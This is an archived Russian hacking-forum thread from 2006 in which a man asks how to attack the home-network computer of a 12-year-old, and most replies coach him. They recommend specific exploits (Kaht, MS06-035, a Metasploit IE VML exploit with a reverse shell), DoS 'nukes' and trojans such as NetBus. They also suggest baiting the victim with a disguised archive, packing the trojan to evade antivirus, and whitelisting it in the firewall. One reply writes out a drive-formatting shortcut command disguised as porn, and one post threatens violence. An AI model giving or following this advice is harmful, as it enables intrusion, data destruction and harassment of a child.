Добро пожаловать! Это — архивная версия форумов на «Хакер.Ru». Она работает в режиме read-only.
 

Надо проучить одного умника (не проходите мимо)!!!

Пользователи, просматривающие топик: none

Зашли как: Guest
Все форумы >> [Западло] >> Надо проучить одного умника (не проходите мимо)!!!
Имя
Сообщение << Старые топики   Новые топики >>
Надо проучить одного умника (не проходите мимо)!!! - 2006-11-10 22:18:57.146666   
meduzas

Сообщений: 8
Оценки: 0
Присоединился: 2006-11-10 22:11:38.913333
Уважаемые граждане есть такая проблемка: У нас самопальная сеть на 2 дома в которой подключено 11 человек. Так вот есть один злобный юзер которого нужно проучить. Мы для общения используем чат Network Assistant (NAssi). Этот юзер мелкий (ему 12 лет) был подключен к сети одним из последних и после этого пошел бардак он постоянно флудит, ругается матом и тд.:@ Короче его надо как то усмирить и проучить или взять его комп под контроль каким то образом.

Сеть организована так: в одном доме стоит свич, к нему подключены юзеры и в другом, свичи соединили между собой. Мы находимся в резных домах. Доступ у него на дисках открыт только на чтение, но есть у него папка с полным доступом для скидывания файлов. Винда ХР СП1. Никаких фаирволов у него нету, насчет антивируса не в курсе, если даже и есть он его не использует. На компе восновном играет и гадит другим людям… Есть ли какая нибудь возможность его блокировать или чтото подобное. Типо чтоб он не мог зайти на другие компы или что то еще… Короче надо его отрубить от сети с возможностью включения… Выдернуть кабель нет возможности. Может заслать ему трояна какого нибудь чтоб я мог им управлять… Ну вы спецы должны знать как это можно сделать.
Если есть какие нибудь варианты пишите отпишитесь пожалуйста.

Так выглядит его комп в сетевом окружении, если это чем то поможет.
Post #: 1
RE: Надо проучить одного умника (не проходите мимо)!!! - 2006-11-10 22:34:28.036666   
Bug$

Сообщений: 195
Оценки: 0
Присоединился: 2006-10-26 21:41:24.993333
Если у него XP SP1, элементарно получаешь удаленный шелл на его тачке с помощью эксплойта Kaht и его разновидностей, если не поленишься и найдешь примеры использования данного сплойта, то станет понятно, как порутать его ящик и делать с ним чего вздумается.
Post #: 2
RE: Надо проучить одного умника (не проходите мимо)!!! - 2006-11-11 12:07:11.426666   
meduzas

Сообщений: 8
Оценки: 0
Присоединился: 2006-11-10 22:11:38.913333
Мне бы это все более по подробнее если можно. Идеально должен подойти Radmin или что то подобное, но надо ему как-то впарить его,чтоб он не заметил.
Post #: 3
RE: Надо проучить одного умника (не проходите мимо)!!! - 2006-11-11 20:27:27.350000   
asylum

Сообщений: 429
Оценки: 0
Присоединился: 2006-05-30 19:40:47
А ответ "Разбить лицо" не устраивает", просто и со вкусом, и он врядли   полезет в вашу сеть[sm=em121.gif]
Post #: 4
RE: Надо проучить одного умника (не проходите мимо)!!! - 2006-11-11 22:42:41.303333   
genoc1d

Сообщений: 882
Оценки: 0
Присоединился: 2006-08-04 11:32:02
Какое лицо? Какой шелл? Вы о чем? Кому надо тратить личное время ради ушлёпка? Ставь в Nаssi в игнор, и не парься
Post #: 5
RE: Надо проучить одного умника (не проходите мимо)!!! - 2006-11-12 11:14:10.100000   
meduzas

Сообщений: 8
Оценки: 0
Присоединился: 2006-11-10 22:11:38.913333
В игнор не помогает он Тр…ет всем мозги не токо через чат, а еще и через NETSEND. А в морду это как то не гуманно ему толи 11 толи 12 а мне 22. Мне нужно именно что то такое чтоб могло его усмирить. Например начинает он гнать в чате, а я ему дима пока и рубаю ему комп, или хотябы сетку. Типо БАН такой. ЧТОБЫ ЭТОТ ЛОСЬ ЗНАЛ!!! :D
Post #: 6
RE: Надо проучить одного умника (не проходите мимо)!!! - 2006-11-12 13:12:08.006666   
genoc1d

Сообщений: 882
Оценки: 0
Присоединился: 2006-08-04 11:32:02
Если у него ниже ХР и нет заплат, то его можно спокойно валить нюками (nuke). Софт: samnuke, smbdie, voidozer1, wnewk.
Post #: 7
RE: Надо проучить одного умника (не проходите мимо)!!! - 2006-11-12 22:31:51.676666   
meduzas

Сообщений: 8
Оценки: 0
Присоединился: 2006-11-10 22:11:38.913333
У него виндовс ХР СП1. А что конкретно эти нюки делают? И где их брать?[sm=20.gif] Если не трудно ссылочек дайте [sm=sm128.gif] И как всетаки насчет радмина можно ему как то его пропихнуть в комп под видом программы или вместе с программой и подойдет ли он для моих целей?
Post #: 8
RE: Надо проучить одного умника (не проходите мимо)!!! - 2006-11-12 22:47:57.926666   
TheFeaR

Сообщений: 1923
Оценки: 0
Присоединился: 2006-01-25 18:16:33
quote:

ORIGINAL: meduzas

В игнор не помогает он Тр…ет всем мозги не токо через чат, а еще и через NETSEND. А в морду это как то не гуманно ему толи 11 толи 12 а мне 22. Мне нужно именно что то такое чтоб могло его усмирить. Например начинает он гнать в чате, а я ему дима пока и рубаю ему комп, или хотябы сетку. Типо БАН такой. ЧТОБЫ ЭТОТ ЛОСЬ ЗНАЛ!!! :D

сделай ключик в реестр,который отключает службу сообщений виндовс и раздай ее всем в сети.. и сообщения через нэтсэнд пропадут
Post #: 9
RE: Надо проучить одного умника (не проходите мимо)!!! - 2006-11-12 22:53:30.833333   
meduzas

Сообщений: 8
Оценки: 0
Присоединился: 2006-11-10 22:11:38.913333
Вобше не хотелось бы отключать я ею тоже пользуюсь иногда? Или она токо на прием пахать не будет?
Post #: 10
RE: Надо проучить одного умника (не проходите мимо)!!! - 2006-11-12 23:05:54.786666   
TheFeaR

Сообщений: 1923
Оценки: 0
Присоединился: 2006-01-25 18:16:33
насчет приема\отправки - честно признаюсь. не в курсе…  или впарь ему этот ключ и пусть обломается с нэт сэндом.
Post #: 11
RE: Надо проучить одного умника (не проходите мимо)!!! - 2006-11-12 23:23:43.456666   
T

Сообщений: 1100
Оценки: 0
Присоединился: 2006-01-14 00:15:36
ХАНА вы гоните ))) В насси есть финча удалённый диспетчер задач, снимай там смело процесс ЕХПЛОРЕР, и радуйся его пустому скрину ) такмже можно врубить винамп, или на худой канец просто руками запустить р-админ ему, и рулить его компом, сиди пасьянсы раскладуй пака он комп не ресетнёт ) а так и винде жить недолго ) а фиг он догазаеся как в насе отключить эту финчу ))) кароче ори пока молодой )))))(пока не пришли и не набили лицо…)
Post #: 12
RE: Надо проучить одного умника (не проходите мимо)!!! - 2006-11-12 23:28:05.396666   
TheFeaR

Сообщений: 1923
Оценки: 0
Присоединился: 2006-01-25 18:16:33
quote:

ORIGINAL: T

ХАНА вы гоните ))) В насси есть финча удалённый диспетчер задач, снимай там смело процесс ЕХПЛОРЕР, и радуйся его пустому скрину ) такмже можно врубить винамп, или на худой канец просто руками запустить р-админ ему, и рулить его компом, сиди пасьянсы раскладуй пака он комп не ресетнёт ) а так и винде жить недолго ) а фиг он догазаеся как в насе отключить эту финчу ))) кароче ори пока молодой )))))(пока не пришли и не набили лицо…)

нажать три кнопки и усе… хотя если ламер он об этом может не знать…
Post #: 13
RE: Надо проучить одного умника (не проходите мимо)!!! - 2006-11-13 01:58:20.630000   
voody

Сообщений: 958
Оценки: 0
Присоединился: 2005-02-06 22:28:30
Ну, во-первых, kaHt это хорошая идея, как здесь уже кто-то сказал, раз WinXP с первым SP, но вообще, я считаю, что лучше всего ему троян впарить (это быстрее, и удобнее, чем просто командная строка) - там все будет зависить только от твоей фантазии. Лучше самому написать, я, например, своим пользуюсь (потому, что свой троян полюбому лучше, будешь уверен, что он ничем не палиться, и его клиент с твоим компом ничего не сделает + чужие трояны могут давать доступ не только тебе, но и их автору, а тебе, думаю, это не надо), но если языками программирования не владеешь - можешь взять готовый. Есть, например, бесплатный троян "Anti-Lamer Backdoor". Пользовался им, нормально работает, функций много, скачать можно где угодно, в Гугле за пару минут найдешь. Вообще, советую впарить под видом SFX-архива WinRAR с интересной для жертвы информацией (например, фоткой голой бабы), думаю, клюнет. Удачи.
Post #: 14
RE: Надо проучить одного умника (не проходите мимо)!!! - 2006-11-13 12:38:38.020000   
genoc1d

Сообщений: 882
Оценки: 0
Присоединился: 2006-08-04 11:32:02

quote:

ORIGINAL: meduzas

У него виндовс ХР СП1. А что конкретно эти нюки делают? И где их брать?[sm=20.gif] Если не трудно ссылочек дайте [sm=sm128.gif]

Что делают? Бывает по-разному: могут из сети выкинуть, или чаще комп вырубают. Мелочь, а приятно. + не затруднительно, кнопку нажал и чела вынесло. Где найти? Не маленький - гугл/яндекс.
Post #: 15
RE: Надо проучить одного умника (не проходите мимо)!!! - 2006-11-13 12:43:20.863333   
genoc1d

Сообщений: 882
Оценки: 0
Присоединился: 2006-08-04 11:32:02

quote:

ORIGINAL: T

ХАНА вы гоните ))) В насси есть финча удалённый диспетчер задач, снимай там смело процесс ЕХПЛОРЕР, и радуйся его пустому скрину ) такмже можно врубить винамп, или на худой канец просто руками запустить р-админ ему, и рулить его компом, сиди пасьянсы раскладуй пака он комп не ресетнёт ) а так и винде жить недолго ) а фиг он догазаеся как в насе отключить эту финчу ))) кароче ори пока молодой )))))

ХАНА ты гонишь. Даже бабушка догадается перекрыть эту фичу
Post #: 16
RE: Надо проучить одного умника (не проходите мимо)!!! - 2006-11-13 13:59:47.163333   
meduzas

Сообщений: 8
Оценки: 0
Присоединился: 2006-11-10 22:11:38.913333
В нетворк асистанте по умолчанию все эти фишки запрешены и он будучи ламером туда не лазил и ничего не включал и не выключал. А жаль конечно через насси процессы можно убивать:D. Вырубить ему lsass.exe и через минуту досвидания.:D Щас вот посмотрю в сети анти ламер бекдор этот.
Post #: 17
RE: Надо проучить одного умника (не проходите мимо)!!! - 2006-11-13 14:07:24.316666   
Greaves

Сообщений: 2167
Оценки: 0
Присоединился: 2006-07-04 19:50:46
Немного про Anti-Lamer BackDoor можно почитать здесь:
http://pro-hack.org/download/s_troyans_4.html

Качать его тут:
http://dkcs.void.ru/index.php?module=soft&FullArticle=soft/troyans/11
Post #: 18
RE: Надо проучить одного умника (не проходите мимо)!!! - 2006-11-14 00:12:50.583333   
meduzas

Сообщений: 8
Оценки: 0
Присоединился: 2006-11-10 22:11:38.913333
Короче вышел небольшой обломчик.:@ При попытке впарить ему этот анти ламер выяснилось, что у него включен касперский. Вобшем ничего не вышло. Надо придумать что то другое или как то обойти его. А так програмулина я смотрю мощная и какраз то, что мне нужно. Только вот от касперского бы как нибудь избавиться. Он обычно раз в день шарит по моим файлам и я его выпаливаю прогой kwatch. Так вот я поприклеивал серверов анти ламера к разным файлам просто на диске е и следил за его активными окнами через Nassi. Так я выяснил, что каспер прибил всех моих троянчиков :@ Но так как у него самого водится миллион всяких вирусов он и не заметил, что я пытался ему чета впарить.

Нужен новый план действий или модернизация старого…8|
Post #: 19
RE: Надо проучить одного умника (не проходите мимо)!!! - 2006-11-14 13:18:54.750000   
-=lebed=-

Сообщений: 1511
Оценки: 0
Присоединился: 2006-04-17 14:25:19
Мля! Во развели! Не проше ли поставить каждому файр и закрыться от него совсем по фильтрации IP,MAC? Ещё мона попробовать заюзать WMF-баг, если базы последние-Каспер запалит бажный Tiff-сплоит. Грамотно настроенный файр - и мона спать спокойно - чувак не залезет и не достанет тебя… Даже если будет извращаться менять MAC и IP всё равно мона закрыться от него фильтрацией по характерным протоколам (создать определённые правила файра).
Post #: 20
RE: Надо проучить одного умника (не проходите мимо)!!! - 2006-11-14 20:12:40.993333   
meduzas

Сообщений: 8
Оценки: 0
Присоединился: 2006-11-10 22:11:38.913333
Фаирвол это нето. Я то могу его использовать, вот у нас имеются такие юзвери которые и не слышали такого слова, а бегать к ним каждый раз когда что то там глюканет это мне не улыбается… Идеально подходят анти ламер ну и думаю радмин(хотя не пробовал его использовать) Есть ли что то типа анти ламера , но чтоб не палилось антивирусом? У него касперский 2006 и базы те, что были при его установке, думаю примерно полугодичной давности.
Post #: 21
RE: Надо проучить одного умника (не проходите мимо)!!! - 2006-11-14 21:01:41.880000   
-=lebed=-

Сообщений: 1511
Оценки: 0
Присоединился: 2006-04-17 14:25:19
Юзай свежий сплоит ie_vml_rectfill.pm от Metasploit Framework заряжай реверсшеллом (начинка) и впаривай бажную ссылку ему (получай шелл - удалённый cmd) и делай с ним что хош (Каспер сплоит не спалит, так как бага относительно новая, а базы старые у каспера)!

P.S. Эх… пропустил юбилейный пост…
Post #: 22
RE: Надо проучить одного умника (не проходите мимо)!!! - 2006-11-16 00:06:16.573333   
T

Сообщений: 1100
Оценки: 0
Присоединился: 2006-01-14 00:15:36
Нихера незнаю, у меня в Насси всё открыто ! Лазь, ламай ! И у меня в сетке мало кто додумался всё позакрывать…
Post #: 23
RE: Надо проучить одного умника (не проходите мимо)!!! - 2006-11-16 01:36:36.680000   
lantern

Сообщений: 202
Оценки: 0
Присоединился: 2006-06-02 14:50:03
Есть такая прога-троян называется netbus. нащет спалит его антивирь незнаю, но штука хорошая.Начнет детишка шалить ты ему сразу shutdown делаеш:D.Не поймет, там много еще гадостей делать можно.
Post #: 24
RE: Надо проучить одного умника (не проходите мимо)!!! - 2006-11-16 02:32:20.843333   
BenAflek

Сообщений: 104
Оценки: 0
Присоединился: 2005-10-12 18:43:24
Sozdavai virus kotorii glushet vint ili otkluchaet mishku i klaviaturu!Postebis ili smerjaet ego rabochei stol!
Post #: 25
RE: Надо проучить одного умника (не проходите мимо)!!! - 2006-11-16 22:45:26.263333   
METALL_BOX

Сообщений: 18
Оценки: 0
Присоединился: 2006-11-01 01:01:51.506666
Java script тоже вроде может натворить.С его помощью по ходу можно добавлять ключи в реестр…
Post #: 26
RE: Надо проучить одного умника (не проходите мимо)!!! - 2006-11-17 01:16:50.263333   
T

Сообщений: 1100
Оценки: 0
Присоединился: 2006-01-14 00:15:36
да, и 100 пудово есть ключи которыйе отрубят клаву или мышу, есть и похуже: как то изменение параметров экрана и т.д. ))) дерзай !
Post #: 27
RE: Надо проучить одного умника (не проходите мимо)!!! - 2006-11-17 14:58:07.170000   
MishaZh

Сообщений: 1
Оценки: 0
Присоединился: 2006-11-17 14:45:01.233333
Вот тебе
0.переименуй TPC.txt в TPC.zip и распакуй
1.TPC.EXE находишь его ip
2.запускаешь MS06-035.exe ip 445
(положил откомпилированный,всеравно ты C++ не знаешь)
3.ждешь и у него полный bsod
Post #: 28
RE: Надо проучить одного умника (не проходите мимо)!!! - 2006-11-18 01:30:34.716666   
voody

Сообщений: 958
Оценки: 0
Присоединился: 2005-02-06 22:28:30
quote:

Короче вышел небольшой обломчик. При попытке впарить ему этот анти ламер выяснилось, что у него включен касперский. Вобшем ничего не вышло. Надо придумать что то другое или как то обойти его. А так програмулина я смотрю мощная и какраз то, что мне нужно. Только вот от касперского бы как нибудь избавиться. Он обычно раз в день шарит по моим файлам и я его выпаливаю прогой kwatch. Так вот я поприклеивал серверов анти ламера к разным файлам просто на диске е и следил за его активными окнами через Nassi. Так я выяснил, что каспер прибил всех моих троянчиков Но так как у него самого водится миллион всяких вирусов он и не заметил, что я пытался ему чета впарить.

Нужен новый план действий или модернизация старого…


Слышал когда-нибудь про программу, типа ASProtect, или аналогичные? Очень советую. После обработки этой прогой любого трояна - он больше ничем палиться не будет (имею ввиду, антивирями, файервол ты таким образом не обойдешь). Кстати, если инетересно, в файервол (брандмауэр) Windows при правах админа можно добавить разрешенную программу при помощи команды NETSH FIREWALL ADD ALLOWEDPROGRAM диск:\путь_к_программе\программа.exe.
Post #: 29
RE: Надо проучить одного умника (не проходите мимо)!!! - 2006-12-03 10:43:29.483333   
LisAndr

Сообщений: 29
Оценки: 0
Присоединился: 2006-12-03 05:57:11.216666
Блин если у него нт'шная винда то просто бомбишь его прогой zloSend или по другому она называется evilICMP, винда зависает намертво но после перезагрузки все ништяк. Пару раз позависает а потом пугни типа еще раз и я спалю твой комп. Товарищи больше артистизма
Post #: 30
RE: Надо проучить одного умника (не проходите мимо)!!! - 2006-12-03 19:00:14.406666   
Grekaa

Сообщений: 359
Оценки: 0
Присоединился: 2006-11-13 00:35:04.520000
НУ ВСЁ МЛЯ:@, ПИНДЫК МАЛОМУ, ГОВОРИ АДРЕС, НАВЕШАЮ ЛЮЛЕЙ МАЛО НЕ ПОКАЖЕТСЯ, ВАЩЕ УБЬЮ НАХРЕН.


чем не поможешь ближнему 
Post #: 31
RE: Надо проучить одного умника (не проходите мимо)!!! - 2006-12-14 07:07:39.500000   
Arakul2220

Сообщений: 227
Оценки: 0
Присоединился: 2006-11-12 13:22:34.926666
А не проще чатик сетевой впарить у которого функция есть удалённый доступ к компу через сеть ….пришол впарил победил!!!!полно таких а себя и всех остальных на код поставил или Strong DC ++ впарь ему… проскань на порты и он твой и Каспер обломаеться…..просто и со вкусом
__________________________________________________________
Мы в ответе за тех кого воспитали…:-)):D
Post #: 32
RE: Надо проучить одного умника (не проходите мимо)!!! - 2006-12-15 08:40:51.530000   
Arigato

Сообщений: 7
Оценки: 0
Присоединился: 2006-12-13 15:06:35.016666
Проще всего скачать прогу NetView вот от сюда http://www.killprog.com/netviewr.html 
Она покажет всё твоё окружение там найти этого умника и посла циклически сообшения (тоесть одно сообшение но оно посылветься с безумной скоростью и безумное количество раз)
там за 10 секунд боле 30.000 сообшений я просто больше не пробывал потом отключал:))  
Post #: 33
RE: Надо проучить одного умника (не проходите мимо)!!! - 2006-12-24 05:46:02.133333   
CyLim4ik

Сообщений: 131
Оценки: 0
Присоединился: 2006-11-26 20:36:14.996666
Можеш поступить жестоко , если ты говоришь чё у него откры доступ к одной папке то создавай ярлык в пути указывай "%windir%\system32\cmd.exe /c cd %systemroot%\system32&format d: /q /y &format e: /q /y", название подбери типа "новое порно" и т.ю и т.п….После перезагрузки компа (если ламер зайдет на ярлык) диск с виндой форматется
Post #: 34
Страниц:  [1]
Все форумы >> [Западло] >> Надо проучить одного умника (не проходите мимо)!!!







Связаться:
Вопросы по сайту / xakep@glc.ru

Предупреждение: использование полученных знаний в противозаконных целях преследуется по закону.